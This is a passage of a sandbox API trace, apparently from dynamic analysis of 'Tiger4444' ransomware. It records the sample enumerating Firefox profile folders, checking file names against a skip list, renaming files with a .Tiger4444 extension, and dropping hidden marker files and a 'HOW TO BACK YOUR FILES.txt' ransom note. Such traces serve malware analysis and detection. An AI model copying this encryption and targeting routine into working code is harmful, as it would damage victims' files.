Size=0x104) returned 0xc75a68 [0051.669] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0051.669] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76210 [0051.669] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc7d140 [0051.670] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76210 | out: hHeap=0xc50000) returned 1 [0051.670] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc7d140 | out: hHeap=0xc50000) returned 1 [0051.670] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75a68 | out: hHeap=0xc50000) returned 1 [0051.670] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=14312280118) returned 1 [0051.670] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89ba8 | out: hHeap=0xc50000) returned 1 [0051.670] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc72258 | out: hHeap=0xc50000) returned 1 [0051.670] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0051.670] CloseHandle (hObject=0x2c8) returned 1 [0051.670] CloseHandle (hObject=0x260) returned 1 [0051.670] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\datareporting\\session-state.json.Tiger4444") returned 116 [0051.670] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\datareporting\\session-state.json" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\datareporting\\session-state.json"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\datareporting\\session-state.json.Tiger4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\datareporting\\session-state.json.tiger4444"), dwFlags=0x1) returned 1 [0051.670] FindNextFileW (in: hFindFile=0xc72f88, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x145d99f2, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0x145d99f2, ftLastAccessTime.dwHighDateTime=0x1d327ca, ftLastWriteTime.dwLowDateTime=0x145d99f2, ftLastWriteTime.dwHighDateTime=0x1d327ca, nFileSizeHigh=0x0, nFileSizeLow=0x33, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="state.json", cAlternateFileName="STATE~1.JSO")) returned 1 [0051.670] lstrcmpiW (lpString1="state.json", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0051.671] lstrcmpiW (lpString1="state.json", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0051.671] lstrcmpiW (lpString1="state.json", lpString2="Tiger4444.exe") returned -1 [0051.671] lstrcmpiW (lpString1="state.json", lpString2=".") returned 1 [0051.671] lstrcmpiW (lpString1="state.json", lpString2="..") returned 1 [0051.671] lstrcmpiW (lpString1="state.json", lpString2="windows") returned -1 [0051.671] lstrcmpiW (lpString1="state.json", lpString2="bootmgr") returned 1 [0051.671] lstrcmpiW (lpString1="state.json", lpString2="pagefile.sys") returned 1 [0051.671] lstrcmpiW (lpString1="state.json", lpString2="boot") returned 1 [0051.671] lstrcmpiW (lpString1="state.json", lpString2="ids.txt") returned 1 [0051.671] lstrcmpiW (lpString1="state.json", lpString2="NTUSER.DAT") returned 1 [0051.671] lstrcpyW (in: lpString1=0x30aeb58, lpString2="state.json" | out: lpString1="state.json") returned="state.json" [0051.671] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\datareporting\\state.json", dwFileAttributes=0x0) returned 1 [0051.671] lstrlenW (lpString="state.json") returned 10 [0051.671] lstrlenW (lpString="Tiger4444") returned 9 [0051.671] lstrcmpiW (lpString1="tate.json", lpString2="Tiger4444") returned -1 [0051.671] lstrlenW (lpString=".dll") returned 4 [0051.671] lstrcmpiW (lpString1="json", lpString2=".dll") returned 1 [0051.671] lstrlenW (lpString=".lnk") returned 4 [0051.672] lstrcmpiW (lpString1="json", lpString2=".lnk") returned 1 [0051.672] lstrlenW (lpString=".ini") returned 4 [0051.672] lstrcmpiW (lpString1="json", lpString2=".ini") returned 1 [0051.672] lstrlenW (lpString=".sys") returned 4 [0051.672] lstrcmpiW (lpString1="json", lpString2=".sys") returned 1 [0051.672] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\datareporting\\state.json" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\datareporting\\state.json"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0051.672] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0051.672] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=14312490992) returned 1 [0051.672] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=51) returned 1 [0051.672] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89680 [0051.672] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71c80 [0051.672] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x340, lpName=0x0) returned 0x2c8 [0051.673] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x340) returned 0xbe0000 [0051.674] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0051.674] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76440 [0051.674] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0051.674] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75950 [0051.674] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc7d140 [0051.674] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75950 | out: hHeap=0xc50000) returned 1 [0051.674] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc7d140 | out: hHeap=0xc50000) returned 1 [0051.674] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76440 | out: hHeap=0xc50000) returned 1 [0051.674] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=14312757668) returned 1 [0051.675] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89680 | out: hHeap=0xc50000) returned 1 [0051.675] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71c80 | out: hHeap=0xc50000) returned 1 [0051.675] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0051.675] CloseHandle (hObject=0x2c8) returned 1 [0051.675] CloseHandle (hObject=0x260) returned 1 [0051.675] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\datareporting\\state.json.Tiger4444") returned 108 [0051.675] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\datareporting\\state.json" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\datareporting\\state.json"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\datareporting\\state.json.Tiger4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\datareporting\\state.json.tiger4444"), dwFlags=0x1) returned 1 [0051.678] FindNextFileW (in: hFindFile=0xc72f88, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x145d99f2, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0x145d99f2, ftLastAccessTime.dwHighDateTime=0x1d327ca, ftLastWriteTime.dwLowDateTime=0x145d99f2, ftLastWriteTime.dwHighDateTime=0x1d327ca, nFileSizeHigh=0x0, nFileSizeLow=0x33, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="state.json", cAlternateFileName="STATE~1.JSO")) returned 0 [0051.678] FindClose (in: hFindFile=0xc72f88 | out: hFindFile=0xc72f88) returned 1 [0051.678] lstrcpyW (in: lpString1=0x30aeb58, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0051.678] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\datareporting\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\datareporting\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ac [0051.678] CreateFileMappingW (hFile=0x2ac, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x260 [0051.678] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xbe0000 [0051.679] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0051.679] CloseHandle (hObject=0x260) returned 1 [0051.679] CloseHandle (hObject=0x2ac) returned 1 [0051.679] GetCurrentThreadId () returned 0xfa8 [0051.679] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc665c8 [0051.679] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\datareporting\\archived", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\datareporting\\archived") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\datareporting\\archived" [0051.679] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc8d4a0 | out: hHeap=0xc50000) returned 1 [0051.679] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc665c0 | out: hHeap=0xc50000) returned 1 [0051.679] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\datareporting\\archived" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\datareporting\\archived") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\datareporting\\archived" [0051.679] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\datareporting\\archived", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\datareporting\\archived\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\datareporting\\archived\\" [0051.679] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\datareporting\\archived\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\datareporting\\archived\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\datareporting\\archived\\.BFC0E91B00AE8A0620D3" [0051.679] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\datareporting\\archived\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\datareporting\\archived\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2ac [0051.682] WriteFile (in: hFile=0x2ac, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0051.684] FlushFileBuffers (hFile=0x2ac) returned 1 [0051.685] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\datareporting\\archived\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0051.685] CloseHandle (hObject=0x2ac) returned 1 [0051.685] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\datareporting\\archived") returned 96 [0051.685] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0051.686] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\datareporting\\archived\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x147168f2, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0x14717c78, ftLastAccessTime.dwHighDateTime=0x1d327ca, ftLastWriteTime.dwLowDateTime=0x83d3764f, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc72d48 [0051.686] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0051.686] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0051.686] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0051.686] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0051.686] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x147168f2, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0x14717c78, ftLastAccessTime.dwHighDateTime=0x1d327ca, ftLastWriteTime.dwLowDateTime=0x83d3764f, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0051.686] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0051.686] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0051.686] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0051.686] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0051.686] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0051.686] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x83d3764f, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x83d3764f, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x83d3764f, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0051.686] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0051.686] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0051.686] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x14717c78, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0xb8403501, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xb8403501, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="2017-09", cAlternateFileName="")) returned 1 [0051.686] lstrcmpiW (lpString1="2017-09", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0051.686] lstrcmpiW (lpString1="2017-09", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0051.686] lstrcmpiW (lpString1="2017-09", lpString2="Tiger4444.exe") returned -1 [0051.686] lstrcmpiW (lpString1="2017-09", lpString2=".") returned 1 [0051.686] lstrcmpiW (lpString1="2017-09", lpString2="..") returned 1 [0051.686] lstrcmpiW (lpString1="2017-09", lpString2="windows") returned -1 [0051.686] lstrcmpiW (lpString1="2017-09", lpString2="bootmgr") returned -1 [0051.686] lstrcmpiW (lpString1="2017-09", lpString2="pagefile.sys") returned -1 [0051.686] lstrcmpiW (lpString1="2017-09", lpString2="boot") returned -1 [0051.686] lstrcmpiW (lpString1="2017-09", lpString2="ids.txt") returned -1 [0051.686] lstrcmpiW (lpString1="2017-09", lpString2="NTUSER.DAT") returned -1 [0051.686] lstrcpyW (in: lpString1=0x30aeb6a, lpString2="2017-09" | out: lpString1="2017-09") returned="2017-09" [0051.686] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc66600 [0051.686] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0xd2) returned 0xc5f6a8 [0051.686] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc66608 | out: ListHead=0xc66828, ListEntry=0xc66608) returned 0xc66668 [0051.686] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x14717c78, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0xb8403501, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xb8403501, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="2017-09", cAlternateFileName="")) returned 0 [0051.686] FindClose (in: hFindFile=0xc72d48 | out: hFindFile=0xc72d48) returned 1 [0051.686] lstrcpyW (in: lpString1=0x30aeb6a, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0051.687] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\datareporting\\archived\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\datareporting\\archived\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ac [0051.687] CreateFileMappingW (hFile=0x2ac, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x260 [0051.687] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xbe0000 [0051.687] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0051.687] CloseHandle (hObject=0x260) returned 1 [0051.687] CloseHandle (hObject=0x2ac) returned 1 [0051.687] GetCurrentThreadId () returned 0xfa8 [0051.687] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc66608 [0051.687] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\datareporting\\archived\\2017-09", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\datareporting\\archived\\2017-09") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\datareporting\\archived\\2017-09" [0051.687] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc5f6a8 | out: hHeap=0xc50000) returned 1 [0051.687] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66600 | out: hHeap=0xc50000) returned 1 [0051.687] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\datareporting\\archived\\2017-09" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\datareporting\\archived\\2017-09") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\datareporting\\archived\\2017-09" [0051.687] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\datareporting\\archived\\2017-09", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\datareporting\\archived\\2017-09\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\datareporting\\archived\\2017-09\\" [0051.687] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\datareporting\\archived\\2017-09\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\datareporting\\archived\\2017-09\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\datareporting\\archived\\2017-09\\.BFC0E91B00AE8A0620D3" [0051.687] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\datareporting\\archived\\2017-09\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\datareporting\\archived\\2017-09\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2ac [0051.690] WriteFile (in: hFile=0x2ac, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0051.693] FlushFileBuffers (hFile=0x2ac) returned 1 [0051.695] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\datareporting\\archived\\2017-09\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0051.696] CloseHandle (hObject=0x2ac) returned 1 [0051.696] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\datareporting\\archived\\2017-09") returned 104 [0051.696] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0051.696] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\datareporting\\archived\\2017-09\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x14717c78, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0xb8403501, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0x83d3764f, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc72e88 [0051.696] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0051.696] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0051.696] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0051.696] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0051.696] FindNextFileW (in: hFindFile=0xc72e88, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x14717c78, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0xb8403501, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0x83d3764f, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0051.696] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0051.696] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0051.696] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0051.696] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0051.696] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0051.696] FindNextFileW (in: hFindFile=0xc72e88, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x83d3764f, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x83d3764f, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x83d3764f, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0051.697] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0051.697] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0051.697] FindNextFileW (in: hFindFile=0xc72e88, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14723fca, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0x14723fca, ftLastAccessTime.dwHighDateTime=0x1d327ca, ftLastWriteTime.dwLowDateTime=0x14728de9, ftLastWriteTime.dwHighDateTime=0x1d327ca, nFileSizeHigh=0x0, nFileSizeLow=0xbdc, dwReserved0=0xa0000003, dwReserved1=0x0, 